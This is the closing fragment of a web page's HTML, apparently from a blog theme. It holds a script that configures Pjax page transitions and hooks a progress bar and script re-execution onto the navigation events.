        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart()
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd()
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'))
            KEEP.initExecute()
        });
    });
</script>




</body>
</html>
